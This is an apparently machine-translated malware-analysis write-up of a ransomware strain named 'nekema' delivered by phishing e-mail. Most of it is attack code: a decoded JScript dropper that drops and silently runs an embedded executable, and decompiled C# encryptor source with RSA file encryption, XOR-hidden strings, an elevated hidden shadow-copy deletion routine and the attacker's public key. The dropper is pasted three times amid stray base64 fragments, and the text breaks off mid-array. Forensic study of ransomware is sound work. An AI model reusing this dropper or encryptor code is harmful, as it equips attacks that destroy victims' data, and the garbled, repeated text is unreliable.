We pick a cryptograph, let's call it - “nekema”
So, the next crypto-fiber encrypted files in a small office, the standard problem of our time. I came to see, and a miracle happened - the letter with the infection was not deleted. I wrote down the link from which the file with the infection is being loaded, gave a lecture on the importance of backups, transferred the infected files to a separate folder until better times and left the frustrated accountants.
At home I decided to see how the infection occurs, and analyze, maybe there is a chance to recover the data. What came of it - under the cut, welcome!
Infection
Delivery of the crypto-fiber - by email, the letter looks like a business, it is clear that the point delivery is for a specific office, an email is available on the organization's website The letter as if attaches a file in the archive format * .rar with the name “Act of verification No. 317 generated by any accountant, is 1C 09112017.rar”, but in fact, when you hover the cursor on the file, you can see that the file was placed on the file storage bitly.com as a short link, the link does not cite, for obvious reasons. The link leads to the real archive "act of reconciliation №317 formed 1C 09112017.rar". Inside the archive - “file verification report No. 317 formed 1 09112017.wsf”, which was launched, which led to file encryption. The result - the files have become the form - "% file name%.% File extension% .t20ajvx21j" - example: "Koala.jpg.t20ajvx21j". On the desktop, the files "HOW - TO - RETURN - YOUR - FILES.jpg" - contains information with instructions (picture in the title) and "ssda.far" - the purpose of the file will be described below, as well as the list of extensions.
As described in the instructions sent files to the specified address, naturally took the most important file. In response, quite quickly a letter arrived with the decrypted file and the requirement to transfer the amount in the amount of 0.03 btc, at the exchange rate at that time 12,390 rubles. Accountants estimated losses, and decided not to pay the extortionist, the benefit that 1C has already been transferred to the cloud. And the rest of the files were duplicated. Cost a little blood.
Kaspersky Free was installed on the victim's computer, but he didn’t say anything.
')
Script - content and analysis
So the file: "file verification report No. 317 formed 1 09112017.wsf". The size is 141,693 bytes.
I will give a small code so that it is clear what we are dealing with:
Script source code - reduced.
<job id="EVHQQ"> <script language="JScript.Encode"> #@~^GikCAA==&JeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMM@#@&\C.,ls']vtk^MWkWB3B6ORoHJf}HvSE4k 4m/++*v~E Um.k2Oc?4+^sBBB)9}fA jDDnlsvBBd4+^VRmwask1lOkKxvDp@#@&7CD,fH}~xP +SP)mOr7+pr(%+1YcC^$!Dbp@#@&\m.,2J}P{Pftrc^D lO+AVnh xYvEl6;lrbI@#@&\wnxD- .......... </script></job> The file is encrypted using JScript.Encode and is not readable. The tool found on Github was used for decryption - Windows Script Decoder 1.8
After decrypting, we got a readable file:
Decrypted script - reduced.
<job id="EVHQQ"> <script language="JScript.Encode"> //**************************************************** var al=['Microso'+'ft.XMLDOM','bin.base64','WScript.Shell','ADODB.Stream','shell.application']; var DMO = new ActiveXObject(al[0]); var ELO = DMO.createElement("afqa"); vFP=rvpa(); ELO.dataType = al[1]; if (vFP==3.5) {ELO.text = gvp3()} else {ELO.text = gvp4()} ELO.text = gvp4(); ELO.text=ELO.text.substring(8); var dot= ELO.nodeTypedValue; sfile(); strt(noome2); function gvp3(){ var t="ASTADA//TVqQAAMAAAAEAAAA//G4AZQBrAGUAegAxAC4AZQB4AGUAAAAAAC4ABwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAbgBlAGsAZQBtAGEAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... .... "; return t; } function setname(){ if (vFP==3.5) {var sn='eselp3.ax'} else {sn='eselp4.ax'} return sn; } function strt(n){ W1S = new ActiveXObject(al[2]); W1S.Run('cmd.exe /C '+n, 0, false); } function sfile(){ var foso = new ActiveXObject(al[2]); noome2 = foso.ExpandEnvironmentStrings("%AppData%")+"\\"+setname(); var aod=new ActiveXObject(al[3]); aod.Type=1; aod.open(); aod.write(dot); aod.saveToFile(noome2,2); aod.close(); } function gvp4(){ var t="ASTADA//TVqQAAMAAAAEAAAA//QBtAGEALgBlAHgAZQAAAAAALgAHAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABuAGUAawBlAG0AYQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAwAAADIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... .... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; return t; } function rvpa(){ var wFRI= 0x10; var wFFO= 0x20; var rv=4; var oWS= GetObject("winmgmts:\\\\.\\root\\CIMV2"); var cItems = oWS.ExecQuery("SELECT * FROM Win32_OperatingSystem", "WQL", wFRI | wFFO); var eItems = new Enumerator(cItems); var objItem = eItems.item(); if (objItem.Caption.indexOf('Windows 7')>0) rv=3.5; if (objItem.Caption.indexOf('Windows 2003')>0) rv=3.5; if (objItem.Caption.indexOf('Windows 2000')>0) rv=3.5; if (objItem.Caption.indexOf('Windows XP')>0) rv=3.5; if (objItem.Caption.indexOf('Windows Vista')>0) rv=3.5; return rv; } </script> </job> G4AZQBrAGUAegAxAC4AZQB4AGUAAAAAAC4ABwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAbgBlAGsAZQBtAGEAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <job id="EVHQQ"> <script language="JScript.Encode"> //**************************************************** var al=['Microso'+'ft.XMLDOM','bin.base64','WScript.Shell','ADODB.Stream','shell.application']; var DMO = new ActiveXObject(al[0]); var ELO = DMO.createElement("afqa"); vFP=rvpa(); ELO.dataType = al[1]; if (vFP==3.5) {ELO.text = gvp3()} else {ELO.text = gvp4()} ELO.text = gvp4(); ELO.text=ELO.text.substring(8); var dot= ELO.nodeTypedValue; sfile(); strt(noome2); function gvp3(){ var t="ASTADA//TVqQAAMAAAAEAAAA//G4AZQBrAGUAegAxAC4AZQB4AGUAAAAAAC4ABwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAbgBlAGsAZQBtAGEAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... .... "; return t; } function setname(){ if (vFP==3.5) {var sn='eselp3.ax'} else {sn='eselp4.ax'} return sn; } function strt(n){ W1S = new ActiveXObject(al[2]); W1S.Run('cmd.exe /C '+n, 0, false); } function sfile(){ var foso = new ActiveXObject(al[2]); noome2 = foso.ExpandEnvironmentStrings("%AppData%")+"\\"+setname(); var aod=new ActiveXObject(al[3]); aod.Type=1; aod.open(); aod.write(dot); aod.saveToFile(noome2,2); aod.close(); } function gvp4(){ var t="ASTADA//TVqQAAMAAAAEAAAA//QBtAGEALgBlAHgAZQAAAAAALgAHAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABuAGUAawBlAG0AYQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAwAAADIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... .... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; return t; } function rvpa(){ var wFRI= 0x10; var wFFO= 0x20; var rv=4; var oWS= GetObject("winmgmts:\\\\.\\root\\CIMV2"); var cItems = oWS.ExecQuery("SELECT * FROM Win32_OperatingSystem", "WQL", wFRI | wFFO); var eItems = new Enumerator(cItems); var objItem = eItems.item(); if (objItem.Caption.indexOf('Windows 7')>0) rv=3.5; if (objItem.Caption.indexOf('Windows 2003')>0) rv=3.5; if (objItem.Caption.indexOf('Windows 2000')>0) rv=3.5; if (objItem.Caption.indexOf('Windows XP')>0) rv=3.5; if (objItem.Caption.indexOf('Windows Vista')>0) rv=3.5; return rv; } </script> </job> QBtAGEALgBlAHgAZQAAAAAALgAHAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABuAGUAawBlAG0AYQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAwAAADIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <job id="EVHQQ"> <script language="JScript.Encode"> //**************************************************** var al=['Microso'+'ft.XMLDOM','bin.base64','WScript.Shell','ADODB.Stream','shell.application']; var DMO = new ActiveXObject(al[0]); var ELO = DMO.createElement("afqa"); vFP=rvpa(); ELO.dataType = al[1]; if (vFP==3.5) {ELO.text = gvp3()} else {ELO.text = gvp4()} ELO.text = gvp4(); ELO.text=ELO.text.substring(8); var dot= ELO.nodeTypedValue; sfile(); strt(noome2); function gvp3(){ var t="ASTADA//TVqQAAMAAAAEAAAA//G4AZQBrAGUAegAxAC4AZQB4AGUAAAAAAC4ABwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAbgBlAGsAZQBtAGEAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... .... "; return t; } function setname(){ if (vFP==3.5) {var sn='eselp3.ax'} else {sn='eselp4.ax'} return sn; } function strt(n){ W1S = new ActiveXObject(al[2]); W1S.Run('cmd.exe /C '+n, 0, false); } function sfile(){ var foso = new ActiveXObject(al[2]); noome2 = foso.ExpandEnvironmentStrings("%AppData%")+"\\"+setname(); var aod=new ActiveXObject(al[3]); aod.Type=1; aod.open(); aod.write(dot); aod.saveToFile(noome2,2); aod.close(); } function gvp4(){ var t="ASTADA//TVqQAAMAAAAEAAAA//QBtAGEALgBlAHgAZQAAAAAALgAHAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABuAGUAawBlAG0AYQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAwAAADIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... .... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; return t; } function rvpa(){ var wFRI= 0x10; var wFFO= 0x20; var rv=4; var oWS= GetObject("winmgmts:\\\\.\\root\\CIMV2"); var cItems = oWS.ExecQuery("SELECT * FROM Win32_OperatingSystem", "WQL", wFRI | wFFO); var eItems = new Enumerator(cItems); var objItem = eItems.item(); if (objItem.Caption.indexOf('Windows 7')>0) rv=3.5; if (objItem.Caption.indexOf('Windows 2003')>0) rv=3.5; if (objItem.Caption.indexOf('Windows 2000')>0) rv=3.5; if (objItem.Caption.indexOf('Windows XP')>0) rv=3.5; if (objItem.Caption.indexOf('Windows Vista')>0) rv=3.5; return rv; } </script> </job> Script work:
al - stores an array of ActiveX object names that will be used in the script:
var al=['Microso'+'ft.XMLDOM','bin.base64','WScript.Shell','ADODB.Stream','shell.application']; A variable is accessed by an index - an example of “al [1] means - bin.base64”
var DMO = new ActiveXObject(al[0]); var ELO = DMO.createElement("afqa"); The DMO object Microsoft.XMLDOM is created and in it creates an element node with the name “afqa” in the ELO variable.
ELO.dataType = al[1]; if (vFP==3.5) {ELO.text = gvp3()} else {ELO.text = gvp4()} ELO.text = gvp4(); ELO.text=ELO.text.substring(8); var dot= ELO.nodeTypedValue; sfile(); Functions gvp3 () and gvp4 () - return text in which binary files are encoded using base64.
The ELO element is assigned the data type - bin.base64 and, depending on the OS version, is assigned the value of the text = text field of the encoded binary file in base64 format.
Then the text is copied from ELO to ELO starting from the 8th character. Then the file is placed in the dot variable in the decoded form.
The vFP variable stores the return value of the rvpa () function - which, depending on the version of Windows, returns rv = 4 for Windows 8 and higher, and for Windows XP- Windows 7 rv = 3.5.
The sfile () function saves the file in the folder “C: \ Users \% user% \ AppData \ Roaming” with the name obtained from the setname () function - “eselp3.ax” or “eselp4.ax” depending on the variable rv.
The full file name is placed in the variable "noome2" - "C: \ Users \% user% \ AppData \ Roaming \ eselp3.ax"
Finally, calling the strt (noome2) function starts the file, using the 'cmd / c% path to the file%'.
If you change the file extension to .exe, you can see the file properties:
Properties
Here you can see the name of the source file "nekema".
Binary
The following tools were used for the analysis:
.NET Reflector 9.0
SharpDevelop 4.3
Run Reflector and load the file. We see the structure:
We are interested in nekez1 , we save the source code for analysis:
The source code Nekez1 left key functions for analysis. Added comments to variables.
namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 